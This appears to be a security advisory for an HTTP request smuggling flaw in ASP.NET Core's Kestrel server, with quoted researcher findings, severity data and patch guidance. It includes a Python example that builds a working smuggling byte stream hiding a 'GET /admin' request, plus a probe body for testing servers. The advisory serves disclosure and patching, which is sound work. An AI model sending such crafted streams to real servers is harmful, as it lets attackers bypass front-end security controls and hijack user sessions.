
Microsoft: ASP.NET Core Kestrel HTTP Request Smuggling via Chunk Extension Parsing

CVE-2025-55315 · Critical · Published
CVSS: 9.9 Critical · Network · Low privileges required
EPSS: 0.01284 (1.3% probability of exploitation in the next 30 days)
CWE: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Summary

Per Praetorian's blog: "While testing different implementations, I found that ASP.NET Core's Kestrel server was vulnerable to request smuggling through malformed chunked transfer encoding extensions. … I then sent the following malformed HTTP request with a newline character (\n) embedded in the chunk extension … The server only echoed back xy, indicating that \nxx was being treated as part of the chunk extension. This parsing leniency creates a TERM.EXT vulnerability: When deployed behind front-end proxies that interpret the lone \n as a line terminator, this enables request smuggling." NVD describes the issue as "Inconsistent interpretation of HTTP requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network."

The mechanism is a line-termination mismatch: Kestrel ended a chunk-size line (and the ";extension" after the size) only at CRLF, so a bare LF inside the extension was swallowed as extension data, while a front end that treats a bare LF as a line terminator starts reading chunk data from that point. The two parsers then disagree on where chunks, and therefore the body, end, and bytes the front end has already classified as body can reach Kestrel as the start of a second request.
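To make the discrepancy concrete, the following is an added example and is not code from the Praetorian write-up or from ASP.NET Core. It implements two chunked-body decoders that differ in a single rule (whether a bare LF ends the chunk-size line), runs both over the page's probe body, and lays out one constructed byte stream in which the lenient parser finishes the body early and treats the trailing bytes as a new pipelined request while the strict parser is still inside a chunk. The strict decoder models only the lone-LF rule the blog attributes to the front end; real proxies differ in other ways. The host `app.internal`, the path `/admin`, and the `ff`-chunk layout are placeholders constructed for this example.

```python
import re

# Added example (not code from the Praetorian write-up or from ASP.NET Core):
# two chunked-body decoders that differ in exactly one rule, how a chunk-size
# line and its ";extension" are terminated. lone_lf_ends_line=False models the
# unpatched Kestrel behaviour described on this page (only CRLF ends the line,
# so a bare LF inside the extension is swallowed); lone_lf_ends_line=True
# models a front end that treats a bare LF as a line terminator. All request
# bytes below are constructed for this example; host and path are placeholders.

CRLF = b"\r\n"


def _read_line(buf, pos, lone_lf_ends_line):
    """Return (line_without_terminator, position_after_terminator)."""
    i = pos
    while i < len(buf):
        if buf[i:i + 2] == CRLF:
            return buf[pos:i], i + 2
        if lone_lf_ends_line and buf[i] == 0x0A:
            return buf[pos:i], i + 1
        i += 1
    raise ValueError("incomplete: no line terminator")


def decode_chunked(body, lone_lf_ends_line):
    """Decode a chunked body (trailers not modelled). Returns
    (decoded_payload, leftover): leftover is everything after the 0-chunk,
    i.e. what this parser would treat as the next pipelined request."""
    out = bytearray()
    pos = 0
    while True:
        line, pos = _read_line(body, pos, lone_lf_ends_line)
        size = int(line.split(b";", 1)[0].strip(), 16)   # extension ignored
        if size == 0:
            line, pos = _read_line(body, pos, lone_lf_ends_line)
            if line:
                raise ValueError("trailers not modelled")
            return bytes(out), body[pos:]
        if len(body) < pos + size:
            raise ValueError("incomplete: waiting for chunk data")
        out += body[pos:pos + size]
        line, pos = _read_line(body, pos + size, lone_lf_ends_line)
        if line:
            raise ValueError("garbage after chunk data")


# The probe described on this page: a bare LF inside the extension of a
# 2-byte chunk. A server that echoes "xy" swallowed the LF.
PROBE_BODY = b"2;\nxx\r\nxy\r\n0\r\n\r\n"


def probe_outcome(lone_lf_ends_line):
    """The payload a parser decodes from PROBE_BODY, or the error it raises."""
    try:
        return decode_chunked(PROBE_BODY, lone_lf_ends_line)[0]
    except ValueError as exc:
        return "rejected: %s" % exc


def build_smuggle_stream(path=b"/admin", host=b"app.internal"):
    """Constructed layout: the lenient parser finishes early and sees the
    trailing request as a new pipelined request, while the strict parser is
    still inside a 0xff-byte chunk that swallows it.

      lenient: size line "6;\\nab", data "zz\\r\\nff", then 0-chunk -> done
      strict : size line "6;",     data "ab\\r\\nzz", size line "ff" -> 255
               bytes of data covering "0\\r\\n\\r\\n" + request + padding
    """
    head = b"6;\nab\r\nzz\r\nff\r\n0\r\n\r\n"
    tail = b"\r\n0\r\n\r\n"          # ends the strict parser's 0xff chunk

    def request(content_length):
        return (b"GET " + path + b" HTTP/1.1\r\nHost: " + host +
                b"\r\nContent-Length: " + str(content_length).encode() +
                b"\r\n\r\n")

    # The smuggled request's Content-Length must absorb the padding and tail
    # so the lenient parser consumes the stream cleanly; iterate until the
    # digit count of the length is stable.
    content_length = 0
    for _ in range(3):
        pad_len = 0xFF - len(b"0\r\n\r\n") - len(request(content_length))
        content_length = pad_len + len(tail)
    pad_len = content_length - len(tail)
    return head + request(content_length) + b"A" * pad_len + tail


def next_request(stream):
    """Minimal consumer for what the lenient parser left over: returns the
    request line and whatever is unconsumed after a Content-Length body."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    m = re.search(rb"(?i)\r\ncontent-length:\s*(\d+)", head)
    body_len = int(m.group(1)) if m else 0
    return head.split(CRLF, 1)[0], rest[body_len:]


if __name__ == "__main__":
    print("lenient:", probe_outcome(False), "| strict:", probe_outcome(True))
    stream = build_smuggle_stream()
    payload, leftover = decode_chunked(stream, False)
    print("lenient payload:", payload, "| next request:", next_request(leftover)[0])
    payload, leftover = decode_chunked(stream, True)
    print("strict saw the request as body data:", b"GET /admin" in payload, leftover)
```

On the probe, the lenient decoder returns `xy`, exactly what the blog reports the unpatched server echoing, while the strict decoder stops at the bare LF and then chokes on `xy` as a chunk size. On the constructed stream, the lenient side decodes `zz\r\nff` and hands `GET /admin` to the request parser as a fresh request, whereas the strict side never sees a request line at all because those bytes fall inside its 255-byte chunk. Sending the probe body to a Kestrel instance and checking whether `xy` comes back is the quick way to tell a patched server from an unpatched one; whether the pair is exploitable still depends on what the front end in front of it does with a bare LF.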

Affected Packages / Versions

  • Package: ASP.NET Core (Kestrel HTTP server)
  • Affected range: releases before the October 14, 2025 servicing release on each affected ASP.NET Core servicing track; Microsoft's October 14, 2025 advisory (MSRC) enumerates the affected tracks and the fixed version on each
  • Patched version: the October 14, 2025 ASP.NET Core servicing release for the track in use

Impact

Per Praetorian’s blog (general request-smuggling framing): “Examples of what these malicious requests can do include bypassing front-end security controls, hijacking user accounts, performing requests on behalf of victims, and poisoning the web server’s cache to serve malicious content.”

Severity Rationale

Per Praetorian’s blog: “The vulnerability garnered significant media attention after Microsoft assigned it a CVSS score of 9.9, the highest severity rating ever assigned to an ASP.NET Core vulnerability.” NVD records CVSS 9.9 (Critical) with scope-changing impact.

Fix

Apply the October 14, 2025 ASP.NET Core servicing release on every affected track. Updating the machine's shared runtime does not reach self-contained or single-file deployments, which carry their own copy of the runtime: rebuild and redeploy those with a patched SDK, and where an application references Kestrel as a NuGet package rather than through the shared framework, update that package reference as well. Because the desync needs two parsers that disagree, inventory the reverse proxies and load balancers in front of Kestrel; the blog ties exploitability to a front end that treats a bare LF as a line terminator, and the probe quoted in the summary (a lone \n inside a chunk extension, with the server echoing xy) is a direct way to confirm whether a given Kestrel instance still swallows it. Praetorian received a $10,000 bug-bounty award from Microsoft for this finding.

Disclosure timeline

  • Jun 22, 2025: Reported to vendor (per Praetorian cve-research listing)
  • Oct 14, 2025: Patch released (Microsoft October 2025 servicing)
  • Oct 14, 2025: Public disclosure (Microsoft advisory)

Discovered by Siddhant Kalgutkar · Published April 29, 2026